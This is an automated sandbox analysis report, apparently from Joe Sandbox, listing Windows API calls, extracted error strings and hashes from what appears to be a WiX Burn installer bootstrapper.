                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLast$AttributesFindMove$Temp$CloseDeleteDirectoryFirstNameNextPathRemove
                                                                                                                                                                    • String ID: *.*$DEL$dirutil.cpp
                                                                                                                                                                    • API String ID: 1544372074-1252831301
                                                                                                                                                                    • Opcode ID: 49862e843f39dd1457f1c7e3389adfe2e0513d7133070168c3017825a4e2c677
                                                                                                                                                                    • Instruction ID: 4d60bec9881b9fd38b585ca1e757fe3f99778cc9b82ebef7516e468001966860
                                                                                                                                                                    • Opcode Fuzzy Hash: 49862e843f39dd1457f1c7e3389adfe2e0513d7133070168c3017825a4e2c677
                                                                                                                                                                    • Instruction Fuzzy Hash: 13B1D673D452399FEB305A658C05BAAB67DAF40720F0182A5EF08BB1D0D776DE90DA90

                                                                                                                                                                    Control-flow Graph (legend: Executed / Not Executed; graph image not reproduced)
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?), ref: 00905217
                                                                                                                                                                      • Part of subcall function 009404F8: InitializeCriticalSection.KERNEL32(0096B5FC,?,00905223,00000000,?,?,?,?,?,?), ref: 0094050F
                                                                                                                                                                      • Part of subcall function 0090120A: CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,0090523F,00000000,?), ref: 00901248
                                                                                                                                                                      • Part of subcall function 0090120A: GetLastError.KERNEL32(?,?,?,0090523F,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00901252
                                                                                                                                                                    • CoInitializeEx.COMBASE(00000000,00000000,?,?,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00905285
                                                                                                                                                                      • Part of subcall function 00940E07: GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 00940E28
                                                                                                                                                                    • GetVersionExW.KERNEL32(?,?,?,?,?,?,?), ref: 00905317
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00905321
                                                                                                                                                                    • CoUninitialize.COMBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0090558E
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to initialize Wiutil., xrefs: 009052E1
                                                                                                                                                                    • Failed to run per-user mode., xrefs: 00905494
                                                                                                                                                                    • Failed to initialize Regutil., xrefs: 009052C9
                                                                                                                                                                    • 3.11.1.2318, xrefs: 00905384
                                                                                                                                                                    • Failed to run untrusted mode., xrefs: 009054B6
                                                                                                                                                                    • Failed to initialize XML util., xrefs: 009052F9
                                                                                                                                                                    • Failed to initialize Cryputil., xrefs: 009052A6
                                                                                                                                                                    • Failed to run per-machine mode., xrefs: 0090546C
                                                                                                                                                                    • Failed to parse command line., xrefs: 00905245
                                                                                                                                                                    • Failed to initialize engine state., xrefs: 0090526C
                                                                                                                                                                    • Failed to run RunOnce mode., xrefs: 0090541C
                                                                                                                                                                    • Invalid run mode., xrefs: 009053F9
                                                                                                                                                                    • Failed to run embedded mode., xrefs: 00905444
                                                                                                                                                                    • Failed to initialize core., xrefs: 009053C3
                                                                                                                                                                    • Failed to get OS info., xrefs: 0090534F
                                                                                                                                                                    • Failed to initialize COM., xrefs: 00905291
                                                                                                                                                                    • engine.cpp, xrefs: 00905345
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorInitializeLast$AddressArgvCommandCriticalHandleLineModuleProcSectionUninitializeVersion
                                                                                                                                                                    • String ID: 3.11.1.2318$Failed to get OS info.$Failed to initialize COM.$Failed to initialize Cryputil.$Failed to initialize Regutil.$Failed to initialize Wiutil.$Failed to initialize XML util.$Failed to initialize core.$Failed to initialize engine state.$Failed to parse command line.$Failed to run RunOnce mode.$Failed to run embedded mode.$Failed to run per-machine mode.$Failed to run per-user mode.$Failed to run untrusted mode.$Invalid run mode.$engine.cpp
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00943609,00000000,?,00000000), ref: 00943069
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,0092C025,?,00905405,?,00000000,?), ref: 00943075
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 009430B5
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 009430C1
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64EnableWow64FsRedirection), ref: 009430CC
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 009430D6
                                                                                                                                                                    • CoCreateInstance.OLE32(0096B6B8,00000000,00000001,0094B818,?,?,?,?,?,?,?,?,?,?,?,0092C025), ref: 00943111
                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 009431C0
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc$CreateErrorExitHandleInstanceLastModuleProcess
                                                                                                                                                                    • String ID: IsWow64Process$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$xmlutil.cpp
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 009033C7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,009010DD,?,00000000), ref: 009033E8
                                                                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,?,00000000), ref: 009010F6
                                                                                                                                                                      • Part of subcall function 00901175: HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,0090111A,cabinet.dll,00000009,?,?,00000000), ref: 00901186
                                                                                                                                                                      • Part of subcall function 00901175: GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,0090111A,cabinet.dll,00000009,?,?,00000000), ref: 00901191
                                                                                                                                                                      • Part of subcall function 00901175: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0090119F
                                                                                                                                                                      • Part of subcall function 00901175: GetLastError.KERNEL32(?,?,?,?,?,0090111A,cabinet.dll,00000009,?,?,00000000), ref: 009011BA
                                                                                                                                                                      • Part of subcall function 00901175: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 009011C2
                                                                                                                                                                      • Part of subcall function 00901175: GetLastError.KERNEL32(?,?,?,?,?,0090111A,cabinet.dll,00000009,?,?,00000000), ref: 009011D7
                                                                                                                                                                    • CloseHandle.KERNELBASE(?,?,?,?,0094B4D0,?,cabinet.dll,00000009,?,?,00000000), ref: 00901131
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressErrorFileHandleLastModuleProc$CloseCreateHeapInformationName
                                                                                                                                                                    • String ID: cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msasn1.dll$msi.dll$version.dll$wininet.dll
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed create working folder., xrefs: 0091A0EE
                                                                                                                                                                    • Failed to copy working folder., xrefs: 0091A116
                                                                                                                                                                    • Failed to calculate working folder to ensure it exists., xrefs: 0091A0D8
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CurrentDirectoryErrorLastProcessWindows
                                                                                                                                                                    • String ID: Failed create working folder.$Failed to calculate working folder to ensure it exists.$Failed to copy working folder.
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,?,009348AE,00000000,00967F08,0000000C,00934A05,00000000,00000002,00000000), ref: 009348F9
                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,009348AE,00000000,00967F08,0000000C,00934A05,00000000,00000002,00000000), ref: 00934900
                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00934912
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessHeap.KERNEL32(?,000001C7,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903960
                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903967
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocateProcess
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1357844191-0
                                                                                                                                                                    • Opcode ID: 973076f48228b5003903e91b8d1be41be5d019051aa43d990d2e705fea4b7a68
                                                                                                                                                                    • Instruction ID: 762bced2efefc0549248273999a6398dd3d35630ba3b84b59e3c946df49d5d98
                                                                                                                                                                    • Opcode Fuzzy Hash: 973076f48228b5003903e91b8d1be41be5d019051aa43d990d2e705fea4b7a68
                                                                                                                                                                    • Instruction Fuzzy Hash: 40C012361AC20CAB8B006FF8EC0EC9A3BACBB296027048400B905C2120C738E010AB60
                                                                                                                                                                    APIs
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0090E058
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0090E736
                                                                                                                                                                      • Part of subcall function 0090394F: GetProcessHeap.KERNEL32(?,000001C7,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903960
                                                                                                                                                                      • Part of subcall function 0090394F: RtlAllocateHeap.NTDLL(00000000,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903967
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeHeapString$AllocateProcess
                                                                                                                                                                    • String ID: Cache$CacheId$Chain/ExePackage|Chain/MsiPackage|Chain/MspPackage|Chain/MsuPackage$ExePackage$Failed to allocate memory for MSP patch sequence information.$Failed to allocate memory for package structs.$Failed to allocate memory for patch sequence information to package lookup.$Failed to allocate memory for rollback boundary structs.$Failed to find backward transaction boundary: %ls$Failed to find forward transaction boundary: %ls$Failed to get @Cache.$Failed to get @CacheId.$Failed to get @Id.$Failed to get @InstallCondition.$Failed to get @InstallSize.$Failed to get @LogPathVariable.$Failed to get @PerMachine.$Failed to get @Permanent.$Failed to get @RollbackBoundaryBackward.$Failed to get @RollbackBoundaryForward.$Failed to get @RollbackLogPathVariable.$Failed to get @Size.$Failed to get @Vital.$Failed to get next node.$Failed to get package node count.$Failed to get rollback bundary node count.$Failed to parse EXE package.$Failed to parse MSI package.$Failed to parse MSP package.$Failed to parse MSU package.$Failed to parse dependency providers.$Failed to parse payload references.$Failed to parse target product codes.$Failed to select package nodes.$Failed to select rollback boundary nodes.$InstallCondition$InstallSize$Invalid cache type: %ls$LogPathVariable$MsiPackage$MspPackage$MsuPackage$PerMachine$Permanent$RollbackBoundary$RollbackBoundaryBackward$RollbackBoundaryForward$RollbackLogPathVariable$Size$Vital$`<u$always$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msi.dll$package.cpp$wininet.dll$yes
                                                                                                                                                                    • API String ID: 336948655-2953049543
                                                                                                                                                                    • Opcode ID: 83d43a41ca9250af6fe72487c184e7a54223e98b52c0414ca7b7fbde821a853a
                                                                                                                                                                    • Instruction ID: 701e5463fe98625239dafc16f6bd322809c6d3a15530536e52e7f8cd8c9d8575
                                                                                                                                                                    • Opcode Fuzzy Hash: 83d43a41ca9250af6fe72487c184e7a54223e98b52c0414ca7b7fbde821a853a
                                                                                                                                                                    • Instruction Fuzzy Hash: B632D231D4522AEFCB11DFA4CC42FAEBAB4AF84725F104A65F910BB2D0D775AD009B90

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: StringVariant$AllocClearFreeInit
                                                                                                                                                                    • String ID: AboutUrl$Arp$Classification$Comments$Contact$Department$DisableModify$DisableRemove$DisplayName$DisplayVersion$ExecutableName$Failed to get @AboutUrl.$Failed to get @Classification.$Failed to get @Comments.$Failed to get @Contact.$Failed to get @Department.$Failed to get @DisableModify.$Failed to get @DisableRemove.$Failed to get @DisplayName.$Failed to get @DisplayVersion.$Failed to get @ExecutableName.$Failed to get @HelpLink.$Failed to get @HelpTelephone.$Failed to get @Id.$Failed to get @Manufacturer.$Failed to get @Name.$Failed to get @ParentDisplayName.$Failed to get @PerMachine.$Failed to get @ProductFamily.$Failed to get @ProviderKey.$Failed to get @Publisher.$Failed to get @Register.$Failed to get @Tag.$Failed to get @UpdateUrl.$Failed to get @Version.$Failed to parse @Version: %ls$Failed to parse related bundles$Failed to parse software tag.$Failed to select ARP node.$Failed to select Update node.$Failed to select registration node.$Failed to set registration paths.$HelpLink$HelpTelephone$Invalid modify disabled type: %ls$Manufacturer$Name$ParentDisplayName$PerMachine$ProductFamily$ProviderKey$Publisher$Register$Registration$Tag$Update$UpdateUrl$Version$button$registration.cpp$yes
                                                                                                                                                                    • API String ID: 760788290-2956246334
                                                                                                                                                                    • Opcode ID: 9dd025abeb29be6a9239570262a2ab1d122f4df12d5fe06e27e7cc0f7435f922
                                                                                                                                                                    • Instruction ID: bf99724f3ab823fb675afebbffc5adcad058abdeb0eb0ffa7d27e3f38d7585c5
                                                                                                                                                                    • Opcode Fuzzy Hash: 9dd025abeb29be6a9239570262a2ab1d122f4df12d5fe06e27e7cc0f7435f922
                                                                                                                                                                    • Instruction Fuzzy Hash: 4EE1F632E4462ABECB31DAA0CC62FAEB6A86B81715F114671FE21F75D1D7609F0497C0

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 0090B502
                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(000000FF,00000000,00000000,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0090B550
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 0090B556
                                                                                                                                                                    • ReadFile.KERNELBASE(00000000,00904461,00000040,?,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0090B59E
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 0090B5A4
                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0090B601
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0090B607
                                                                                                                                                                    • ReadFile.KERNELBASE(00000000,?,00000018,00000040,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0090B650
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0090B656
                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(00000000,-00000098,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0090B6C7
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0090B6CD
                                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0090B716
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0090B71C
                                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0090B765
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0090B76B
                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0090B7B7
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0090B7BD
                                                                                                                                                                      • Part of subcall function 0090394F: GetProcessHeap.KERNEL32(?,000001C7,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903960
                                                                                                                                                                      • Part of subcall function 0090394F: RtlAllocateHeap.NTDLL(00000000,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903967
                                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,00000028,00000018,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0090B810
                                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,00000028,00000028,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0090B872
                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(00000000,?,00000000,00000000,00000000,00000034,00000001,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0090B8FC
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0090B906
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$ErrorLast$Read$Pointer$Heap$AllocateProcess
                                                                                                                                                                    • String ID: ($.wix$4$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get total size of bundle.$Failed to open handle to engine process path.$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$PE$PE Header from file didn't match PE Header in memory.$burn$section.cpp

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • SetEvent.KERNEL32(?,?,?,?,?,009208BC,?,?), ref: 00920D25
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,009208BC,?,?), ref: 00920D2F
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,009208BC,?,?), ref: 00920D74
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,009208BC,?,?), ref: 00920D7F
                                                                                                                                                                    • ResetEvent.KERNEL32(?,?,?,?,?,009208BC,?,?), ref: 00920DB7
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,009208BC,?,?), ref: 00920DC1
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$Event$ObjectResetSingleWait
                                                                                                                                                                    • String ID: Failed to allocate buffer for stream.$Failed to copy stream name: %ls$Failed to create file: %ls$Failed to reset begin operation event.$Failed to set end of file.$Failed to set file pointer to beginning of file.$Failed to set file pointer to end of file.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 009033C7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,009010DD,?,00000000), ref: 009033E8
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00904F40
                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00904F4F
                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00904F5E
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00904F69
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to append original command line., xrefs: 00904E69
                                                                                                                                                                    • burn.filehandle.attached, xrefs: 00904E17
                                                                                                                                                                    • Failed to append %ls, xrefs: 00904E1C
                                                                                                                                                                    • Failed to allocate full command-line., xrefs: 00904E8E
                                                                                                                                                                    • Failed to cache to clean room., xrefs: 00904DC2
                                                                                                                                                                    • -%ls="%ls", xrefs: 00904DE6
                                                                                                                                                                    • Failed to allocate parameters for unelevated process., xrefs: 00904DFA
                                                                                                                                                                    • %ls %ls, xrefs: 00904E55
                                                                                                                                                                    • "%ls" %ls, xrefs: 00904E7A
                                                                                                                                                                    • Failed to launch clean room process: %ls, xrefs: 00904EF7
                                                                                                                                                                    • Failed to wait for clean room process: %ls, xrefs: 00904F23
                                                                                                                                                                    • burn.clean.room, xrefs: 00904DDE
                                                                                                                                                                    • D, xrefs: 00904EA9
                                                                                                                                                                    • engine.cpp, xrefs: 00904EEA
                                                                                                                                                                    • Failed to get path for current process., xrefs: 00904D83
                                                                                                                                                                    • burn.filehandle.self, xrefs: 00904E45
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseHandle$FileModuleName
                                                                                                                                                                    • String ID: "%ls" %ls$%ls %ls$-%ls="%ls"$D$Failed to allocate full command-line.$Failed to allocate parameters for unelevated process.$Failed to append %ls$Failed to append original command line.$Failed to cache to clean room.$Failed to get path for current process.$Failed to launch clean room process: %ls$Failed to wait for clean room process: %ls$burn.clean.room$burn.filehandle.attached$burn.filehandle.self$engine.cpp

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to initialize internal cache functionality., xrefs: 0091779F
                                                                                                                                                                    • Failed to set source process folder variable., xrefs: 00917745
                                                                                                                                                                    • Failed to open manifest stream., xrefs: 009175AB
                                                                                                                                                                    • Failed to get manifest stream from container., xrefs: 009175CC
                                                                                                                                                                    • Failed to get unique temporary folder for bootstrapper application., xrefs: 009177CE
                                                                                                                                                                    • Failed to parse command line., xrefs: 00917667
                                                                                                                                                                    • Failed to set original source variable., xrefs: 0091776A
                                                                                                                                                                    • Failed to overwrite the %ls built-in variable., xrefs: 009176BB
                                                                                                                                                                    • WixBundleUILevel, xrefs: 009176D6, 009176E7
                                                                                                                                                                    • WixBundleSourceProcessPath, xrefs: 009176F8
                                                                                                                                                                    • Failed to initialize variables., xrefs: 00917571
                                                                                                                                                                    • Failed to open attached UX container., xrefs: 0091758E
                                                                                                                                                                    • Failed to get source process folder from path., xrefs: 00917725
                                                                                                                                                                    • Failed to extract bootstrapper application payloads., xrefs: 009177EF
                                                                                                                                                                    • Failed to set source process path variable., xrefs: 00917709
                                                                                                                                                                    • Failed to load manifest., xrefs: 009175E8
                                                                                                                                                                    • Failed to load catalog files., xrefs: 0091780F
                                                                                                                                                                    • WixBundleSourceProcessFolder, xrefs: 00917734
                                                                                                                                                                    • WixBundleOriginalSource, xrefs: 00917759
                                                                                                                                                                    • WixBundleElevated, xrefs: 009176A5, 009176B6
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalInitializeSection
                                                                                                                                                                    • String ID: Failed to extract bootstrapper application payloads.$Failed to get manifest stream from container.$Failed to get source process folder from path.$Failed to get unique temporary folder for bootstrapper application.$Failed to initialize internal cache functionality.$Failed to initialize variables.$Failed to load catalog files.$Failed to load manifest.$Failed to open attached UX container.$Failed to open manifest stream.$Failed to overwrite the %ls built-in variable.$Failed to parse command line.$Failed to set original source variable.$Failed to set source process folder variable.$Failed to set source process path variable.$WixBundleElevated$WixBundleOriginalSource$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleUILevel
                                                                                                                                                                    • API String ID: 32694325-1564579409
                                                                                                                                                                    • Opcode ID: f27b9c370d98d2504a141192e4d0f45d2b321730c9dd88c0d12f70d6acc7388b
                                                                                                                                                                    • Instruction ID: 4d69aac6141fb94be19c9d38fc530b771fde34f9caf2bbb8510884c38510ef20
                                                                                                                                                                    • Opcode Fuzzy Hash: f27b9c370d98d2504a141192e4d0f45d2b321730c9dd88c0d12f70d6acc7388b
